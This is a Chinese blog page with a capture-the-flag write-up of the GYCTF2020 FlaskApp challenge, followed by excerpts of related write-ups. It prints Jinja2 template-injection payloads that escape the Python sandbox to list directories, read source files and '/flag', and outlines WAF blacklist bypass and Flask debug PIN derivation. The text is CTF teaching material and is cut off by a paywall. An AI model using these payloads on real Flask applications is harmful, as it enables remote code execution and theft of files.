[GYCTF2020]FlaskApp 1(SSTI,PIN)

最新推荐文章于 2025-02-25 12:54:48 发布
最新推荐文章于 2025-02-25 12:54:48 发布
阅读量1.4k 收藏 5
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 网络安全 文章标签: flask python php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45577185/article/details/120862099
博客讲述了在GYCTF2020的FlaskApp挑战中,如何利用SSTI(模板注入)攻击进行Python沙盒逃逸。通过分析过滤关键字,构造payload绕过WAF,读取源码找到flag。同时,介绍了PIN码的生成机制,包括获取flask用户名、app.py路径和MAC地址的十进制数。最终,利用PIN码实现远程代码执行并获得flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

f12发现了提示,但是我对PIN没有了解所以没反应过来
在这里插入图片描述
扫了一下网站,发现了一个网站打开
请添加图片描述
在这里插入图片描述
非预期解:
本题存在SSTI注入

加密 {
   
   {
   
   7+7}}
 e3s3Kzd9fQ== 
 解密
 回显14  说明是SSTI

python-Flask模版注入攻击SSTI(python沙盒逃逸)

查看根目录:

 {
   
   % for c in [].__class__.__base__.__subclasses__() %}{
   
   % if c.__name__=='catch_warnings' %}{
   
   {
   
    c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}{
   
   % endif %}{
   
   % endfor %}

解密结果产生no,说明存在waf
在这里插入图片描述
可能被过滤了关键字符,但是我们不知道关键字符,所以要读取一下源码app.py(直接用open)

 {
   
   % for c in [].__class__.__base__.__subclasses__() %}{
   
   % if c.__name__=='catch_warnings' %}{
   
   {
   
    c.__init__.__globals__['__builtins__'].open('app.py','r').read()}}{
   
   % endif %}{
   
   % endfor %}

测试,返回waf,能看到黑名单black_list在这里插入图片描述
整理:看到flag,os,system,popen,import,eval,chr,request,
subprocess,commands,socket,hex,base64

最低0.47元/天 解锁文章

200万优质内容无限畅学
GYCTF2020 FlaskApp
汗的博客
09-04 1959
GYCTF2020 FlaskApp,老规矩,还是buu的平台 知识点 flaskSSTI ssti的绕过(拼接字符串,倒序切片,内置对象、函数) pin码的生成 信息收集 因为题目名flask,所以先不进行常规信息收集,而是观察功能点,寻找易发生ssti的功能 提示里貌似没有什么信息,考虑到功能异常抛出常见于解密环节,所以随便输段不能解密的 直接报错抛出debug信息,看来是开启了debug模式 参见该文章:Flask开启debug模式等于给黑客留了后门 而且读到了app.py的部分代码 大致的
[GYCTF2020]FlaskApp
Logerrik的博客
05-12 447
[GYCTF2020]FlaskApp 1.开始 网站有加密和解密两个功能 感觉就像是个ssti模板注入 但是加密的时候输入{{config}}之类的都会直接被加密 解密的时候输入{{config}}意外的发现进入了debug模式 但是还是不会做 只能抄抄大佬的wp 2.解题 看了看大佬的wp 源码里过滤了os和fsystem等函数还有flag也被过滤了 但是可以用一个字符串拼接的骚操作 {{''.__class__.__bases__[0].__subclasses__()[75].__init__.__
[GYCTF2020]FlaskApp1
2303_77961060的博客
05-09 440
在jinja2模板引擎当中存在下面几个模板,而在这些模板当中可以输入值以及一些控制语句,在jinja2引擎中有两个模板渲染函数,而SSTI注入的原因是由于。通过源代码的框架可以判断是FlaskFlask是使用python编写的一个轻量级的web应用框架,模板引擎使用的是jinja2,遵循MVC模型。可以看到返回有this_is_the_flag.txt,然后对其进行读取,构造。的不正确的使用以及没有对用户输入的数据进行有效的过滤导致的.构造{{config}},先加密,再把加密结果解密,结果输出。
web buuctf [GYCTF2020]FlaskApp
weixin_44214568的博客
04-12 4608
知识点:1.flask的debug模式漏洞 2.flask字符拼接漏洞 1.开题 2.提示flask了,那不得不试一试SSTI 在加密内输入{{7*7}} ,生成base64码e3s3Kjd9fcKg; 将e3s3Kjd9fcKg输入到解码框内,显示no no no说明存在防御 换一个输入{{7+7}},base64码为e3s3Kzd9fQ==,解码后,显示的是14 综上存在SSTI 3.看提示页面,没啥东西,在解密页面(因为解密存在SSTI)再随便输入些字母,...
[GYCTF2020]FlaskApp 1
ubaichu的博客
07-13 1159
[GYCTF2020]FlaskApp 1 详细解题过程
Flask debug 模式生成pin码 + [GYCTF2020]FlaskApp
ShenZ的博客
09-07 3429
ssti的payload还是不太会写… Flask debug 模式生成pin码 计算pin所需要的值为: 1.flask所登录的用户名 2.modname 3.getattr(app, “name”, app.class.name) 4.flask库下app.py的绝对路径 5.当前网络的mac地址的十进制数 6.docker机器id 1.flask所登录的用户名 /etc/passwd 中找到用户名 {% for c in [].__class__.__base__.__subclasses__()
一天一道ctf 第38天(报错模板注入 python沙盒逃逸 pin码生成)
scrawman的博客
07-20 792
[GYCTF2020]FlaskApp 先得到{{7*7}}的base64加密字符串,然后解密,输出no no no,看样子是被过滤了,这里可能有SSTI模板注入,主要是看怎么绕过过滤 随便输入字符串让base64解密报错得到文件位置/usr/local/lib/python3.7/site-packages/flask/app.py {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warni
BUUCTF-模板注入专项刷题
m0_51563147的博客
02-27 3616
SSTI: 目录 简单 [CSCCTF 2019 Qual]FlaskLight 签到 [BJDCTF2020]Cookie is so stable twig模板注入 [WesternCTF2018]shrine 想方设法获取config [CISCN2019 华东南赛区]Web11 smarty模板注入 [BJDCTF2020]The mystery of ip [GYCTF2020]FlaskApp debug模式一定条件下可以窃取出来pin码命令执行,但是题目过滤的不够严格导致.
BUU41 [GYCTF2020]FlaskApp1SSTI
2401_86190146的博客
02-25 1094
题目:加密处没啥事,但是解密的地方提交{{7*7}}就会返回报错界面,顺便把代码也爆出来了先将字符串 text编码为字节对象,然后使用函数对这个字节对象进行 Base64 解码操作,报错的原因也就是解码没成功,将{{7*7}}进行base64编码后输入可能是过滤了{{ }} 把 {{ }} 去了还是nonono试试7+7,成功。。?具体流程:1.套模板,发现被过滤了字符,查看源代码2.列目录。
[GYCTF2020]FlaskAppSSTI
qq_45521281的博客
06-09 3122
进入题目: 是一个用flask写的一个base64加解密应用。有一个加密页面和解密页面,思路应该是在加密页面输入payload进行加密,加密结果在解密页面进行解密,输出解密后的payload被渲染到页面输出后执行了payload。 官方write up说看到根据hint1,失败乃成功之母,应该能想到flask的debug模式。但是我当时看到的时候并没有想到是debug模式,这就是没有进行足够积累的后果。 base64decode在不会解析的时候就会报错,然后习惯性对base64解密页面进行报错实验,ba
buuoj FlaskApp
最新发布
03-18
### 关于 buuoj 和 FlaskApp 的信息 #### 1. **buuoj 平台简介** `buuoj` 是一个在线渗透测试练习平台,专注于 Web 安全领域。它提供了多种类型的漏洞环境供学习者实践攻击与防御技术[^1]。该平台上的题目通常基于真实世界中的安全问题设计,例如 SQL 注入、XSS 跨站脚本攻击以及 SSRF 服务器端请求伪造等。 对于 `FlaskApp` 类型的题目,在 buuoj 中主要涉及 PythonFlask 框架开发的应用程序中存在的安全隐患分析。这些隐患可能来源于不恰当的输入验证机制或者模板引擎执行未过滤的内容等问题[^4]。 #### 2. **Flask 应用基础架构解析** 在构建 Flask 应用时,开发者常会利用 Jinja2 模板渲染页面数据。然而如果未能正确处理用户提交的数据,则可能导致诸如 SSTI (Server-Side Template Injection) 这样的严重威胁。下面是一个简单的例子展示如何通过恶意 payload 利用此类漏洞获取敏感文件内容: ```jinja {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {{ c.__init__.__globals__['__builtins__'].open('/flag', 'r').read() }} {% endif %} {% endfor %} ``` 上述代码片段展示了当应用程序允许动态加载类实例并访问其属性方法时所面临的风险。 #### 3. **GYCTF2020 FlaskApp 题目回顾** 根据 GYCTF2020 的一道名为 FlaskApp 的赛题描述可知,选手需要找到隐藏于应用内部逻辑里的 WAF 函数实现细节,并绕过防护措施完成特定目标。此过程不仅考验参赛者的逆向工程能力,同时也要求具备扎实的编程功底以便快速理解复杂业务流程。 以下是官方给出的一个简化版解决方案思路说明: - 寻找是否存在可被滥用的功能接口; - 尝试构造特殊字符串触发异常行为暴露更多线索; - 结合已知条件推导最终答案路径。 实际操作过程中还需要注意避开显而易见的安全检测规则以免失败告终。 --- ### 提供一段示例代码帮助初学者入门 Flask 开发 为了便于理解和后续深入研究,这里附上一份基本的 Flask 程序框架作为参考起点: ```python from flask import Flask, render_template_string app = Flask(__name__) @app.route('/') def index(): return render_template_string('<h1>Hello World!</h1>') if __name__ == '__main__': app.run(debug=True) ``` 以上代码创建了一个最简形式的服务站点,默认监听本地地址并通过浏览器访问根目录即可看到欢迎消息显示效果[^2]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值